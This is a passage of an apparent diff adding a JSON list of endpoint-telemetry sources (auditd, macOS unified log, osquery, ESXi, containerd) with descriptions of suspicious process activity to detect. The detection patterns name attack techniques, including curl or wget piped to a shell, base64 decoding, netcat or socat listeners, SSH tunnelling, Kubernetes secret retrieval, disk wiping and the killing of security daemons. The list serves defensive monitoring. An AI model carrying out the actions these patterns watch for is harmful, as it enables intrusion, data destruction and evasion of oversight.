+                            "channel": "Docker/Kubernetes audit of exec/attach (kubectl exec) or unexpected child processes inside container"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec of osascript, bash, curl with suspicious parameters"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of container management CLIs (docker, crictl, kubectl) or interpreted shells (sh, bash, python) within container context"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of discovery commands targeting backup binaries, processes, or config paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution logs showing discovery commands like mdfind, system_profiler, or launchctl list"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events OR launchd"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd or process_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process and file events via log stream"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of scripts or binaries spawned from browser processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Browser processes launching unexpected interpreters (osascript, bash)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of defaults, plutil, or common editors (vim/nano) targeting plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "EXECVE"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of bash, python, or perl processes spawned by browser/email client"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of osascript, bash, or Terminal initiated from Mail.app or Safari"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of /bin/sh,/bin/bash,/usr/bin/curl,/usr/bin/python by service accounts (e.g., apache, mysql, nobody) immediately after inbound network activity."
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "parent_name in ('sshd','httpd','screensharingd') spawning shells or scripting runtimes."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process activity stream"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "SYSCALL record where exe contains passwd/userdel/chage and auid != root"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Post-login execution of unrecognized child process from launchd or loginwindow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of base64|openssl|xxd|python|perl with arguments matching Base64 flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process command line contains base64, -enc, openssl enc -base64"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: arguments contain Base64-like strings"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "commands containing base64, openssl enc -base64, xxd -p"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of process launched via loginwindow session restore"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: exec + filewrite: ~/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "/var/log/containers/*.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Java apps or other processes with hidden window attributes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process Execution"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve on code or jetbrains-gateway with remote flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: code or jetbrains-gateway launching with --tunnel or --remote"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'processImagePath CONTAINS \"curl\" OR \"osascript\"'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd, shred, wipe targeting block devices"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of sleep or ping command within script interpreted by bash/python"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or socket/connect system calls from processes using crypto libraries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process using AES/RC4 routines unexpectedly"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "execution of known firewall binaries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "type=EXECVE or SYSCALL for /bin/date, /usr/bin/timedatectl, /sbin/hwclock, /bin/cat /etc/timezone, /bin/cat /proc/uptime"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "execve: command like 'date', 'timedatectl', 'hwclock', 'cat /etc/timezone'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process exec events of systemsetup, date, ioreg with command_line parameters indicating time discovery"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: binary == \"/usr/sbin/systemsetup\" and args contains \"-gettimezone\""
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: command LIKE '%systemsetup -gettimezone%' OR '%date%'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of osascript, curl, or unexpected automation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec /usr/bin/pwpolicy"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket(AF_PACKET|AF_INET, SOCK_RAW, *), setsockopt(\u2026 SO_ATTACH_FILTER|SO_ATTACH_BPF \u2026), bpf(cmd=BPF_PROG_LOAD), open/openat path=\"/dev/bpf*\" (BSD/macOS-like) or setcap cap_net_raw."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "KERN messages about eBPF program load/verify or LSM denials related to bpf."
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "open/openat of /dev/bpf*; ioctl BIOCSETF-like operations."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Exec of tcpdump, rvictl, custom tools linked to libpcap.A.dylib; sysextd/systemextensionsctl events for NetworkExtension content filters."
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "/usr/sbin/postfix, /usr/sbin/exim, /usr/sbin/sendmail"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of known flash tools (e.g., flashrom, fwupd)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.firmwareupdater activity or update-firmware binary invoked"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of system tools like dmidecode, lspci, lscpu, dmesg, systemd-detect-virt"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or spawn of 'system_profiler', 'ioreg', 'kextstat', 'sysctl', or calls to sysctl API"
+                        },
+                        {
+                            "name": "macos:endpointSecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Suspicious binaries or scripts interacting with authentication binaries (sshd, gdm, login)"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: Processes unexpectedly invoking Keychain or authentication APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: execve calls where a browser/webview process is parent and child is interpreter (python, sh, ruby) or downloader (curl, wget)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_create: Process creation where parent is Safari/Google Chrome and child is script interpreter or signed-but-unusual helper binary"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:launch"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Shell commands invoked by SQL process such as postgres, mysqld, or mariadbd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of smbclient, smbmap, rpcclient, nmblookup, crackmapexec smb"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: Process execution of \"sharing -l\", \"smbutil view\", \"mount_smbfs\""
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of scp, rsync, curl with remote destination"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "logMessage contains pbpaste or osascript"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call with argv matching known disk enumeration commands (lsblk, parted, fdisk)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process launch of diskutil or system_profiler with SPStorageDataType"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "execution of esxcli with args matching 'storage', 'filesystem', 'core device list'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail.app executing with parameters updating rules state"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/vmkernel.log, /var/log/vmkwarning.log"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: Exec of ffmpeg, avfoundation-based binaries, or custom signed apps accessing camera"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "exec into pod followed by secret retrieval via API"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_name IN (\"VBoxManage\", \"prlctl\") AND command CONTAINS (\"list\", \"show\")"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec srm|exec openssl|exec gpg"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process execution with LD_PRELOAD or modified library path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of process with DYLD_INSERT_LIBRARIES set"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "process creation events linked to container namespaces executing host-level binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process and signing chain events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchservices events for misleading extensions"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Execution of disguised binaries"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process listening or connecting on non-standard ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd services binding to non-standard ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, connect"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "process or cron activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binaries with unsigned or anomalously signed certificates"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve logging for /usr/bin/systemctl and systemd-run"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Invocation of osascript or dylib injection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of files saved in mail or download directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Terminal, osascript, or other interpreters originating from Mail or Preview"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process events"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unauthorized sudo or shell access, especially leading to file changes in /var/www or /srv/http"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of unexpected terminal or web scripts modifying /Library/WebServer/Documents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of CLI tools like psql, mysql, mongo, sqlite3"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process start of Java or native DB client tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loginwindow or tccd-related entries"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: process_events, launchd, and tcc.db access"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "process execution or network connect from just-created container PID namespace"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of pip, npm, gem, or similar package managers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line invocation of pip3, brew install, npm install from interactive Terminal"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "fork/exec of service via PID 1 (systemd)"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of ssh/scp/sftp without corresponding authentication log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of ssh or sftp without corresponding login event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: execve where exe=/usr/bin/python3 or similar interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of remote desktop app or helper binary"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected processes making network calls based on DNS-derived ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl spawning new processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl activity and process creation"
+                        },
+                        {
+                            "name": "containerd:events",
+                            "channel": "New container with suspicious image name or high resource usage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Python, Swift, or other binaries invoking archiving libraries"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Processes linked with libssl or crypto libraries making outbound connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process invoking SSL routines from Security framework"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of binaries located in /etc/init.d/ or systemd service paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binary listed in newly modified LaunchAgent plist"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of bless or nvram modifying boot parameters"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected processes registered with launchd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process launch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, osascript, or unexpected Office processes"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Trust validation failures or bypass attempts during notarization and code signing checks"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "spawned shell or execution environment activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_exec: image in {/bin/bash,/bin/zsh,/usr/bin/osascript,/usr/bin/python*,/usr/bin/curl,/usr/bin/ssh,/usr/bin/open} AND parent in {Preview, TextEdit, Microsoft Word, Microsoft Excel, AdobeReader, Archive Utility, Finder}"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: exe in {/bin/bash,/bin/sh,/usr/bin/python*,/usr/bin/perl,/usr/bin/php,/usr/bin/node,/usr/bin/curl,/usr/bin/wget,/usr/bin/xdg-open,/usr/bin/ssh,/usr/bin/rundll32 (wine)} AND ppid process is a document viewer/browser"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd/sgdisk with arguments writing to sector 0 or partition table"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of zip, ditto, hdiutil, or openssl by processes not normally associated with archiving"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for chmod, chown, chflags with unusual parameters or targets"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "AdvancedHunting(DeviceEvents, ProcessCreate, ImageLoad, AMSI/ETW derived signals)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execve or dylib load from memory without backing file"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands that alter firewall or start listeners: iptables|nft|ufw|firewall-cmd|pfctl|systemctl start sshd/telnet/dropbear; raw-socket/libpcap tools (tcpdump, tshark, nmap --raw)."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of pfctl, socketfilterfw, launchctl start ssh/telnet, libpcap consumers."
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Shell Execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unusual child process tree indicating attempted recovery after crash"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of binaries/scripts presenting false health messages for security daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of processes mimicking Apple Security & Privacy GUIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, setifflags"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events where path like '%tcpdump%'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd, shred, or wipe with arguments targeting block devices"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "systemctl stop auditd, kill -9 <pid>, or modifications to /etc/selinux/config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, git, or Office processes with network connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - process subsystem"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls for qemu-system*, kvm, or VBoxHeadless"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution for VBoxHeadless, prl_vm_app, vmware-vmx"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process logs"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of interpreters (python, perl), custom binaries, or shell utilities with long arguments containing non-standard tokens"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: arguments contain long, non-standard tokens / custom alphabets"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command line or log output shows non-standard encoding routines"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "commands containing long non-standard tokens or custom lookup tables"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/sbin/installer spawning child process from within /private/tmp or package contents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of dpkg or rpm followed by fork/execve from within postinst, prerm, etc."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execve: Helper tools invoked through XPC executing unexpected binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of modified binary without valid signature"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: exe in (/usr/bin/bash,/usr/bin/sh,/usr/bin/zsh,/usr/bin/python*) AND cmdline matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64\\s*-d|python\\s*-c'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: ParentImage in (Terminal, iTerm2) AND Image in (/bin/zsh,/bin/bash,/usr/bin/python*) AND CommandLine matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64 -D|python -c'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process created with repeated ICMP or UDP flood behavior"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "binary execution of security_authtrampoline"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: exec"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Child processes of Safari, Chrome, or Firefox executing scripting interpreters"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of older or non-standard interpreters"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process execution events for permission modification utilities with command-line analysis"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for chmod, chown, chflags with parameter analysis and target path examination"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process execution monitoring for permission modification utilities with command-line argument analysis"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Invocation of packet generation tools (e.g., hping3, nping) or fork bombs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Execution of flooding tools or compiled packet generators"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve for proxy tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process, socket, and DNS logs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events table"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line containing `trap` or `echo 'trap` written to login shell files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log collect --predicate"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or nanosleep with no stdout/stderr I/O"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd or osascript spawns process with delay command"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "systemd-udevd spawning user-defined action from RUN+="
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:spawn"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'eventMessage contains \"exec\"'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "cat|less|grep accessing .bash_history from a non-shell process"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Process execution via .desktop Exec path from /etc/xdg/autostart or ~/.config/autostart"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of dpkg, rpm, or other package manager with list flag"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of system_profiler or osascript invoking enumeration"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "apache2 or nginx spawning sh, bash, or python interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "httpd spawning bash, zsh, python, or osascript"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/libexec/security_authtrampoline or child processes originating from non-trusted binaries triggering credential prompts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security or osascript"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd spawning processes tied to new or modified LaunchDaemon .plist entries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of ping, nping, or crafted network packets via bash or python to reflection services"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of commands modifying iptables/nftables to block selective IPs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System process modifications altering DNS/proxy settings"
+                        },
+                        {
+                            "name": "containerd:Events",
+                            "channel": "unusual process spawned from container image context"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "curl, python scripts, rsync with internal share URLs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: spawn, exec"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Rapid spawning of resource-heavy applications (e.g., Preview, Safari, Office)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation events where command line = pmset with arguments affecting sleep, hibernatemode, displaysleep"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected apps performing repeated DNS lookups"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchservices or loginwindow events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with LD_PRELOAD or linker-related environment variables set"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of process with DYLD_INSERT_LIBRARIES set"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious Swift/Objective-C or scripting processes writing archive-like outputs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of re-parented process"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Anomalous parent PID change"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation with parent PID of 1 (launchd)"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "child process invoking dynamic linker post-ptrace"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Processes executing kextload, spctl, or modifying kernel extension directories"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Unsigned or ad-hoc signed process executions in user contexts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of diskutil or hdiutil attaching hidden partitions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for discovery utilities (system_profiler, sw_vers, dscl, networksetup) with command-line parameter analysis"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process event monitoring with focus on discovery utilities and cryptographic framework usage correlation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected apps generating frequent DNS queries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket: Suspicious creation of AF_UNIX sockets outside expected daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Non-standard processes invoking financial applications or payment APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Agent/headless flags (listen/connect/reverse/tunnel) or remote-control binaries spawning shells"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "systemctl enable/start: Creation/enablement of custom .service units in /etc/systemd/system"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process exec of remote-control apps or binaries with headless/connect flags"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process activity, exec events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream process subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:exec and kext load events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --info --predicate 'eventMessage CONTAINS \"exec\"'"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-DotNETRuntime",
+                            "channel": "Unexpected AppDomain creation events or anomalous AppDomainManager assembly load behavior"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of network stress tools or anomalies in socket/syscall behavior"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unsigned binary execution following SIP change"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands altering firewall or enabling listeners (iptables, nft, ufw, firewall-cmd, systemctl start *ssh*/*telnet*, ip route add, tcpdump, tshark)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of /sbin/pfctl, /usr/libexec/ApplicationFirewall/socketfilterfw, ifconfig, tcpdump, npcap/libpcap consumers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of zip, ditto, hdiutil, or openssl by non-terminal parent processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binaries with TCC protected access under unexpected parent processes such as Finder.app, SystemUIServer, or nsurlsessiond"
+                        },
+                        {
+                            "name": "WinEventLog:AppLocker",
+                            "channel": "EventCode=8003, 8004"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, unlink"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd, processes"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "socat, ssh, or nc processes opening unexpected ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution of ssh with -L/-R forwarding flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd or cron spawning mining binaries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or socket/connect system calls for processes using RSA handshake"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process invoking SecKeyCreateRandomKey or asymmetric crypto APIs"
+                        },
+                        {
+                            "name": "azure:vmguest",
+                            "channel": "Unexpected execution of cloud agent processes (e.g., WindowsAzureGuestAgent.exe, ssm-agent) followed by arbitrary script or binary execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Script interpreter invoked by nginx/apache worker process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of Office binaries with network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of bash/zsh/python/osascript targeting key file locations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of /sbin/emond with child processes launched"
+                        },
+                        {
